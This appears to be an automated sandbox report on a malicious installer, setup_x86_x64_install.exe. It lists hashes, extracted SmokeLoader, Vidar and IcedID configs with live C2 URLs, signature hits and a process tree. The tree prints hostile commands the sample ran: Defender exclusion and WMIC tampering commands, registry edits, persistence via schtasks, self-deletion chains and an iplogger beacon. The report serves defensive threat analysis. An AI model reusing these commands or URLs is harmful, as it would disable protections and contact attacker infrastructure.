Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
22s -
max time network
608s -
platform
windows7_x64 -
resource
win7-de-20210916 -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
icedid
3162718704
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5528 2300 rundll32.exe 72 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3368 2300 rundll32.exe 72 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
resource yara_rule behavioral3/files/0x0006000000012273-98.dat family_socelars behavioral3/files/0x0006000000012273-138.dat family_socelars behavioral3/files/0x0006000000012273-140.dat family_socelars behavioral3/files/0x0006000000012273-141.dat family_socelars behavioral3/files/0x0006000000012273-132.dat family_socelars -
resource yara_rule behavioral3/memory/1164-321-0x0000000000C10000-0x0000000001187000-memory.dmp evasion behavioral3/memory/1164-318-0x0000000000C10000-0x0000000001187000-memory.dmp evasion -
resource yara_rule behavioral3/memory/1164-321-0x0000000000C10000-0x0000000001187000-memory.dmp redline -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral3/memory/2120-195-0x0000000001E80000-0x0000000001F54000-memory.dmp family_vidar behavioral3/memory/2120-196-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral3/files/0x000600000001223a-72.dat aspack_v212_v242 behavioral3/files/0x000600000001223a-71.dat aspack_v212_v242 behavioral3/files/0x000600000001223f-70.dat aspack_v212_v242 behavioral3/files/0x000600000001223f-69.dat aspack_v212_v242 behavioral3/files/0x0006000000012247-75.dat aspack_v212_v242 behavioral3/files/0x0006000000012247-76.dat aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 1552 setup_installer.exe 1972 setup_install.exe 840 Sun1917b8fb5f09db8.exe 1648 Sun19e4ade31b2a.exe 1032 Sun193fda712d9f1.exe 1876 Sun1908b94df837b3158.exe 1808 Sun19262b9e49ad.exe 1872 conhost.exe 1424 Sun19de8ff4b6aefeb8.exe 2072 f.exe 2140 Sun198361825f4.exe 2120 Sun19eb40faaaa9.exe 2152 Sun195a1614ec24e6a.exe 2176 schtasks.exe 2280 Sun1966fb31dd5a07.tmp -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 48 IoCs
pid Process 1048 setup_x86_x64_install.exe 1552 setup_installer.exe 1552 setup_installer.exe 1552 setup_installer.exe 1552 setup_installer.exe 1552 setup_installer.exe 1552 setup_installer.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1972 setup_install.exe 1328 cmd.exe 1856 cmd.exe 308 cmd.exe 1428 cmd.exe 1428 cmd.exe 840 Sun1917b8fb5f09db8.exe 840 Sun1917b8fb5f09db8.exe 1308 cmd.exe 1876 Sun1908b94df837b3158.exe 1876 Sun1908b94df837b3158.exe 1808 Sun19262b9e49ad.exe 1808 Sun19262b9e49ad.exe 1868 cmd.exe 1052 cmd.exe 1052 cmd.exe 1732 cmd.exe 1424 Sun19de8ff4b6aefeb8.exe 1424 Sun19de8ff4b6aefeb8.exe 1040 cmd.exe 1040 cmd.exe 1072 cmd.exe 1628 cmd.exe 1012 schtasks.exe 2152 Sun195a1614ec24e6a.exe 2152 Sun195a1614ec24e6a.exe 2120 Sun19eb40faaaa9.exe 2120 Sun19eb40faaaa9.exe 2176 schtasks.exe 2176 schtasks.exe 2176 schtasks.exe 2280 Sun1966fb31dd5a07.tmp 2280 Sun1966fb31dd5a07.tmp 2280 Sun1966fb31dd5a07.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4588 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com 43 ipinfo.io 180 ip-api.com 329 api.2ip.ua 241 api.2ip.ua 272 ipinfo.io 274 ipinfo.io 44 ipinfo.io 184 ipinfo.io 185 ipinfo.io 238 api.2ip.ua -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2972 2120 WerFault.exe 46 1756 1808 WerFault.exe 43 3188 2448 WerFault.exe 93 2204 3176 WerFault.exe 109 5612 1880 WerFault.exe 161 5900 5352 WerFault.exe 265 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5028 schtasks.exe 2228 schtasks.exe 1012 schtasks.exe 2176 schtasks.exe 4920 schtasks.exe 1300 schtasks.exe 4980 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 4584 timeout.exe 2272 timeout.exe 6580 timeout.exe 6500 timeout.exe -
Kills process with taskkill 9 IoCs
pid Process 568 taskkill.exe 2244 taskkill.exe 6836 taskkill.exe 2928 taskkill.exe 3036 taskkill.exe 1108 taskkill.exe 2240 taskkill.exe 4620 taskkill.exe 3680 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1876 Sun1908b94df837b3158.exe 1876 Sun1908b94df837b3158.exe 1260 Process not Found 1260 Process not Found 1260 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1876 Sun1908b94df837b3158.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1808 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1808 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1808 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1808 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1808 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1808 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1808 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1808 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1808 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1808 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1808 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1808 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1808 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1808 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1808 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1808 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1808 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1808 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1808 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1808 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1808 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1808 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1808 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1808 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1808 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1808 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1808 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1808 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1808 Sun19262b9e49ad.exe Token: 31 1808 Sun19262b9e49ad.exe Token: 32 1808 Sun19262b9e49ad.exe Token: 33 1808 Sun19262b9e49ad.exe Token: 34 1808 Sun19262b9e49ad.exe Token: 35 1808 Sun19262b9e49ad.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1048 wrote to memory of 1552 1048 setup_x86_x64_install.exe 29 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1552 wrote to memory of 1972 1552 setup_installer.exe 30 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1712 1972 setup_install.exe 32 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1328 1972 setup_install.exe 33 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 1308 1972 setup_install.exe 35 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 308 1972 setup_install.exe 34 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1856 1972 setup_install.exe 36 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1428 1972 setup_install.exe 37 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1052 1972 setup_install.exe 38 PID 1972 wrote to memory of 1868 1972 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:1328 -
C:\Users\Admin\AppData\Local\Temp\7zS016E5DD2\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:840 -
C:\Users\Admin\Documents\BW_Igi9GngeSAPG4CS3xhrcH.exe"C:\Users\Admin\Documents\BW_Igi9GngeSAPG4CS3xhrcH.exe"6⤵PID:2776
-
-
C:\Users\Admin\Documents\4viL_aUY2gr0ZZ4oPCItmRWf.exe"C:\Users\Admin\Documents\4viL_aUY2gr0ZZ4oPCItmRWf.exe"6⤵PID:1928
-
C:\Users\Admin\Documents\4viL_aUY2gr0ZZ4oPCItmRWf.exe"C:\Users\Admin\Documents\4viL_aUY2gr0ZZ4oPCItmRWf.exe"7⤵PID:3112
-
-
-
C:\Users\Admin\Documents\4XciQ13zLiAL_zZ0pu_Fo4En.exe"C:\Users\Admin\Documents\4XciQ13zLiAL_zZ0pu_Fo4En.exe"6⤵PID:1164
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\4XciQ13zLiAL_zZ0pu_Fo4En.exe"7⤵PID:4228
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4584
-
-
-
-
C:\Users\Admin\Documents\GPptbIANY3q2Mjww8HAuteDl.exe"C:\Users\Admin\Documents\GPptbIANY3q2Mjww8HAuteDl.exe"6⤵PID:2288
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵
- Executes dropped EXE
PID:2072
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵PID:3092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:3152
-
-
-
-
C:\Users\Admin\Documents\7U6PkI2ZiBm3QYM3OnbpEspr.exe"C:\Users\Admin\Documents\7U6PkI2ZiBm3QYM3OnbpEspr.exe"6⤵PID:1008
-
C:\Users\Admin\Documents\7U6PkI2ZiBm3QYM3OnbpEspr.exeC:\Users\Admin\Documents\7U6PkI2ZiBm3QYM3OnbpEspr.exe7⤵PID:3916
-
-
-
C:\Users\Admin\Documents\4P23tpE21AFuiReDPxDuSypI.exe"C:\Users\Admin\Documents\4P23tpE21AFuiReDPxDuSypI.exe"6⤵PID:2028
-
-
C:\Users\Admin\Documents\C6hQIPIeSPERvqJZqYPV5NiQ.exe"C:\Users\Admin\Documents\C6hQIPIeSPERvqJZqYPV5NiQ.exe"6⤵PID:2064
-
-
C:\Users\Admin\Documents\lkRPchteNSOfGahvcUk4fOGA.exe"C:\Users\Admin\Documents\lkRPchteNSOfGahvcUk4fOGA.exe"6⤵PID:2424
-
C:\Users\Admin\Documents\lkRPchteNSOfGahvcUk4fOGA.exeC:\Users\Admin\Documents\lkRPchteNSOfGahvcUk4fOGA.exe7⤵PID:3924
-
-
-
C:\Users\Admin\Documents\prB04KQ_hrFCpjg6RB7lVv9W.exe"C:\Users\Admin\Documents\prB04KQ_hrFCpjg6RB7lVv9W.exe"6⤵PID:2412
-
-
C:\Users\Admin\Documents\fg96UnyNcamBLCpalU4jcLNk.exe"C:\Users\Admin\Documents\fg96UnyNcamBLCpalU4jcLNk.exe"6⤵PID:2068
-
-
C:\Users\Admin\Documents\PN8XzWPJ_gCbF1yhvxSkdpfX.exe"C:\Users\Admin\Documents\PN8XzWPJ_gCbF1yhvxSkdpfX.exe"6⤵PID:2704
-
-
C:\Users\Admin\Documents\xTdWFFW8spLPk33O5CRJYYkv.exe"C:\Users\Admin\Documents\xTdWFFW8spLPk33O5CRJYYkv.exe"6⤵PID:1004
-
-
C:\Users\Admin\Documents\q5iCo6i74nYgQNap0vSHXGrn.exe"C:\Users\Admin\Documents\q5iCo6i74nYgQNap0vSHXGrn.exe"6⤵PID:1312
-
-
C:\Users\Admin\Documents\S_csEgpa1mCuaFUkP5DUvLQX.exe"C:\Users\Admin\Documents\S_csEgpa1mCuaFUkP5DUvLQX.exe"6⤵PID:1160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im S_csEgpa1mCuaFUkP5DUvLQX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\S_csEgpa1mCuaFUkP5DUvLQX.exe" & del C:\ProgramData\*.dll & exit7⤵PID:4168
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im S_csEgpa1mCuaFUkP5DUvLQX.exe /f8⤵
- Kills process with taskkill
PID:6836
-
-
-
-
C:\Users\Admin\Documents\or9uGREy2dNRPfz4xlUcYo3U.exe"C:\Users\Admin\Documents\or9uGREy2dNRPfz4xlUcYo3U.exe"6⤵PID:2876
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Loads dropped DLL
- Creates scheduled task(s)
PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Executes dropped EXE
- Loads dropped DLL
- Creates scheduled task(s)
PID:2176
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:2284
-
C:\Users\Admin\Documents\4qTaXRePUovje4ALBAs39Y7K.exe"C:\Users\Admin\Documents\4qTaXRePUovje4ALBAs39Y7K.exe"8⤵PID:3428
-
-
C:\Users\Admin\Documents\PlwNoNKzlKGW7TGxjl0IrNUU.exe"C:\Users\Admin\Documents\PlwNoNKzlKGW7TGxjl0IrNUU.exe"8⤵PID:2936
-
C:\Users\Admin\AppData\Local\Temp\7zSACF1.tmp\Install.exe.\Install.exe9⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\7zSBFB6.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:4324
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:1936
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:988
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1772
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5588
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:5544
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:4992
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:2668
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:5284
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:4780
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:6000
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:6416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:5996
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:6340
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:5764
-
